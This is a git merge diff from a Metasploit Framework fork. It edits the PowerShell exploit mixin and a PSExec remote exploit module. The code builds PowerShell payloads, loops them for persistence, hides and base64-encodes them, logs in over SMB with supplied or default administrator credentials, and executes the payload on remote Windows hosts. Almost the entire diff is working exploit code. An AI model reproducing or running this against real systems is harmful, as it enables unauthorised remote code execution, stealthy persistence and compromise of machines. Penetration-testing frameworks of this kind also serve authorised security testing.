Merge branch 'powershell_import' of github.com:sempervictus/metasploit-framework into powershell_import
commit
2c850d8f8b
|
@ -11,7 +11,9 @@ module Exploit::Powershell
|
||||||
super
|
super
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptBool.new('RUN_WOW64', [
|
OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
|
||||||
|
OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
|
||||||
|
OptBool.new('PSH::RUN_WOW64', [
|
||||||
false,
|
false,
|
||||||
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
||||||
false
|
false
|
||||||
|
@ -98,7 +100,7 @@ EOS
|
||||||
#
|
#
|
||||||
# Creates cmd script to execute psh payload
|
# Creates cmd script to execute psh payload
|
||||||
#
|
#
|
||||||
def cmd_psh_payload(pay, old_psh=false)
|
def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'])
|
||||||
# Allow powershell 1.0 format
|
# Allow powershell 1.0 format
|
||||||
if old_psh
|
if old_psh
|
||||||
psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
|
psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
|
||||||
|
@ -106,14 +108,14 @@ EOS
|
||||||
psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
|
psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
|
||||||
end
|
end
|
||||||
# Run our payload in a while loop
|
# Run our payload in a while loop
|
||||||
if datastore['PERSIST']
|
if datastore['PSH::PERSIST']
|
||||||
fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
|
fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
|
||||||
sleep_time = rand(5)+5
|
sleep_time = rand(5)+5
|
||||||
psh_payload = "function #{fun_name}{#{psh_payload}};"
|
psh_payload = "function #{fun_name}{#{psh_payload}};"
|
||||||
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
|
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
|
||||||
end
|
end
|
||||||
# Determine appropriate architecture, manual method reduces script size
|
# Determine appropriate architecture, manual method reduces script size
|
||||||
ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
|
ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
|
||||||
# Wrap in hidden runtime
|
# Wrap in hidden runtime
|
||||||
psh_payload = run_hidden_psh(psh_payload,ps_bin)
|
psh_payload = run_hidden_psh(psh_payload,ps_bin)
|
||||||
# Convert to base64 for -encodedcommand execution
|
# Convert to base64 for -encodedcommand execution
|
||||||
|
|
|
@ -1,6 +1,14 @@
|
||||||
# -*- coding: binary -*-
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
require 'msf/core/exploit/powershell'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking
|
Rank = ManualRanking
|
||||||
|
@ -8,8 +16,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Exploit mixins should be called first
|
# Exploit mixins should be called first
|
||||||
include Msf::Exploit::Remote::SMB::Psexec
|
include Msf::Exploit::Remote::SMB::Psexec
|
||||||
include Msf::Exploit::Powershell
|
include Msf::Exploit::Powershell
|
||||||
include Msf::Auxiliary::Report
|
|
||||||
include Msf::Exploit::EXE
|
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -29,7 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
},
|
},
|
||||||
|
|
||||||
'Author' => [
|
'Author' => [
|
||||||
'RageLtMan <rageltman[at]sempervictus'
|
'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
|
||||||
|
'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
|
||||||
],
|
],
|
||||||
|
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
|
@ -48,9 +55,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Automatic', { } ],
|
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||||
|
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
|
'DisclosureDate' => 'Jan 01 1999',
|
||||||
'References' => [
|
'References' => [
|
||||||
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
||||||
[ 'OSVDB', '3106'],
|
[ 'OSVDB', '3106'],
|
||||||
|
@ -61,43 +70,45 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options([
|
register_options([
|
||||||
OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
|
|
||||||
OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
|
|
||||||
OptBool.new('DryRun',[false,'dry run',false]),
|
OptBool.new('DryRun',[false,'dry run',false]),
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
|
command = cmd_psh_payload(payload.encoded)
|
||||||
if datastore['DryRun']
|
if datastore['DryRun']
|
||||||
print_good command
|
print_good command
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
#Try and authenticate with given credentials
|
if datastore['PSH::RUN_WOW64'] and target_arch.first == "x86_64"
|
||||||
|
fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
|
||||||
|
end
|
||||||
|
|
||||||
|
# Try and authenticate with given credentials
|
||||||
if connect
|
if connect
|
||||||
begin
|
begin
|
||||||
smb_login
|
smb_login
|
||||||
rescue StandardError => autherror
|
rescue StandardError => autherror
|
||||||
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
||||||
return
|
ensure
|
||||||
|
disconnect
|
||||||
end
|
end
|
||||||
# Execute the powershell command
|
# Execute the powershell command
|
||||||
begin
|
|
||||||
print_status("#{peer} - Executing the payload...")
|
print_status("#{peer} - Executing the payload...")
|
||||||
#vprint_good(command)
|
begin
|
||||||
return psexec(command)
|
return psexec(command)
|
||||||
rescue StandardError => exec_command_error
|
rescue StandardError => exec_command_error
|
||||||
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||||
return false
|
ensure
|
||||||
end
|
|
||||||
disconnect
|
disconnect
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
end
|
||||||
|
|
||||||
def peer
|
def peer
|
||||||
return "#{rhost}:#{rport}"
|
return "#{rhost}:#{rport}"
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue